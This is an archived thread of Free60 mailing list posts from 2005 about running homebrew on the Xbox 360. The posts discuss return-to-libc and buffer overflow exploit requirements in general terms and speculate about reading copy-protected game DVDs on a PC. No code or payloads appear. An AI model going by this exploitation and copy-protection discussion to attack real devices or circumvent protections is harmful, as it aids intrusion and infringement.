Re: [Free60-Devel] A possible first way in

[smo]

On 01/12/05, Ed Schouten [EMAIL PROTECTED] wrote:
 Which means the Windows x86 binaries are not running on the Xbox360
 itself. The only way we could exploit this situation is if there was a
 security hole in that network protocol.

Isn't the protocol RDP (aka Terminal Services)? There's a free
open-source client for it at: http://www.rdesktop.org/

It's a complicated beast though.

-smo


---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37alloc_id865op=click
___
free60-devel mailing list
free60-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/free60-devel

Re: [Free60-Devel] Possibility for exploit

[smo]

On 29/11/05, Segin [EMAIL PROTECTED] wrote:
 Has anyone thought of trying a return-to-libc type of exploit? I know
 that the library D3D9 is DirectX 9's Direct3D library. See if we can
 find some exploits on a standard x86 PC regarding that, then see if we
 can apply them on a xbox 360.

Correct me if I'm wrong, but a return-into-libc (or return into any
lib) exploit depends on the functionalíty provided by the library.
Unix return-to-libc exploits use system() to open a shell. There are
probably much more interesting libs than the Direct 3D lib.

There's been a lot of suggestions on buffer overflows, but even with
my limited experience in buffer overflows, I cannot emphasize enough
that for a succesfull buffer overflow exploit you need lots of
information:

1) For a regular buffer overflow, you need to know the stack location
to be able to produce a return address to your exploit code
before/after the return pointer on stack. Same goes for
non-return-address-pointer exploits (code on heap).

2) For a return-to-libc call you need to know the memory locations for
the desired library functions.

Basically you need at least a detailed memory map. If you cannot debug
or examine the memory of a running system, bruteforcing the addresses
can be a time-consuming task (even with lots of NOP padding in the
exploit code, 256 megabytes of memory is a huge space for a few
kilobytes of code). Disassembly of the affected function(s) is almost
a requirement too.

If the stack in a memory page marked non-executable or protected using
software generated canaries, you obviously need to use a return to
libc exploit or a stack bypassing technique (such as one described in
Phrack #56).

I think there's still much groundwork to be done before a buffer
overflow can be successful. Sometimes people mistake just about any
crash on a system which is being fed invalid data as a buffer
overflow. If you can't reverse-engineer the crashing routine, you
might be banging your head against a wall for a long time trying to
get exploit code running.

I might sound a bit negative, but I believe this is the reality we're
facing. However, new information seems to keep coming every day and
I'm looking forward for first decrypted binaries that can be fed
through a disassembler.

-smo


---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37alloc_id865op=click
___
free60-devel mailing list
free60-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/free60-devel

Re: [Free60-Devel] Re: Game DVD formats

[smo]

That was under the subtitle Speculation, so I guess no one has
really tried it yet. I found some threads on some forums that say
Xbox1's DVD drive works on a PC (though nothing too concrete).

On 28/11/05, Constantin Hofstetter [EMAIL PROTECTED] wrote:
 Mhh.. and the
 http://www.free60.org/wiki/DVD page tells us that:

 The DVD-ROM doesn't work on a standard pc workstation

 - I am gona change that to  The DVD-ROM doesn't work on a standard pc
 workstation, yet.
 :)


 On 11/28/05, Constantin Hofstetter  [EMAIL PROTECTED] wrote:
  The HDD also uses a normal SATA hookup - read on free60 on that ;)
 
  http://www.free60.org/wiki/Harddrive
 
 
 
 
 
  On 11/28/05, Sheldon Neuberger [EMAIL PROTECTED] wrote:
   That sounds promising... Does the 360's HDD use a regular SATA hookup?
   Does anyone here have a 360 that they could try this with?
  
   On Mon, 28 Nov 2005 15:12:52 -0500, Constantin Hofstetter
[EMAIL PROTECTED] wrote:
  
How about connecting the DVD drive from the xbox360 to the pc? ;)
Yes, it has a special power plug, but leave that in the xbox360,
 connect
sata to the PC and fire up both -
I wonder what the results would be ...
   
Consti
   
On 11/28/05, smo [EMAIL PROTECTED]  wrote:
   
Hello,
   
No problem :) I wouldn't say I know lots, but at least some basics.
Basically my point is that unless the disc format is such that a PC
DVD drive's optics cannot pickup the data from the disc, I don't
 think
it's a too far-fetched idea that it could be read with a PC DVD drive
(with a modified firmware).
   
On the topic of DVD drives, is there any more info on the Xbox DVD
drive? Is there a comparable PC version of the drive available as
there was for the original Xbox?
   
On 28/11/05, Darren Coles [EMAIL PROTECTED]  wrote:
 Sorry, I just assumed you didn't know anything about the low level
disc
 formats. I think most people just think that the data in a raw disc
image
 (for example) just get written straight to the disc as pits and
troughs
 translated from the 0's and 1's.

 I'm not too hot on the differences between CD and DVD formats at
 that
level
 but I presume they are pretty much the same.

 In my message, I was referring to formats that are 'uncopyable'
 rather
than
 'unripable'.

 If you don't want the disc to be able to be read on a pc, then it
could
be
 done by having multiple sessions, where the first session is closed
and
the
 second session starts at a specific offset into the disc. I think
 the
 dreamcast did something along these lines in addition to the second
session
 being higher density than a normal cd.

 Basically the same as the TOC thing, but without a firmware change
 the
 normal cd/dvd drive probably wouldn't be able to find the second
session.

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] ]
 On Behalf Of smo
 Sent: 28 November 2005 17:45
 To: free60-devel@lists.sourceforge.net
 Subject: Re: [Free60-Devel] Re: Game DVD formats

 Hi,

 I'm aware of basics of CD format (apparently DVD is a lot alike
 though?) and I didn't imply the format was a simple thing. At least
 part of the disc is standard DVD, since it can be read on a PC as
 DVD-video. The DVD drive in both Xboxes is supposed to be a pretty
 standard DVD-drive with some Xbox specific things (and by that I
 mean
 the difference is in the firmware, not in the optics, correct?).

 Looks like weak sectors are used by SafeDisc protection on PC and
 they
 seem to have no problem ripping those...

 On 28/11/05, Darren Coles  [EMAIL PROTECTED] wrote:
  At the lowest level, CD and DVD formats are a lot more
 complicated
than
 you
  might think. Its not just a case of writing the 0's and 1's from
 the
data
  you want to store onto disc.
 
  Theres several layers of error correction and the fact that the
 data
has
  To be encoded in such a way that it can be read back reliably.
 
  If you want to know more, try googling for EFM (eight fourteen
modulation)
  and 'Weak sectors'
 
  -Original Message-
  From: [EMAIL PROTECTED]
  [mailto:
 [EMAIL PROTECTED] ] On Behalf Of smo
  Sent: 28 November 2005 17:02
  To: free60-devel@lists.sourceforge.net
  Subject: [Free60-Devel] Re: Game DVD formats
 
  Hello,
 
  My messages sounded a lot like it was about game piracy. My
apologies,
  it definately
  wasn't about that - I'm more interested in how the security
functions
  from end-to-end.
 
  On 28/11/05, smo  [EMAIL PROTECTED] wrote:
   Hi,
  
   What's so special about current game console DVD formats that
render
   them uncopyable on a PC? They do contain somewhat standard DVD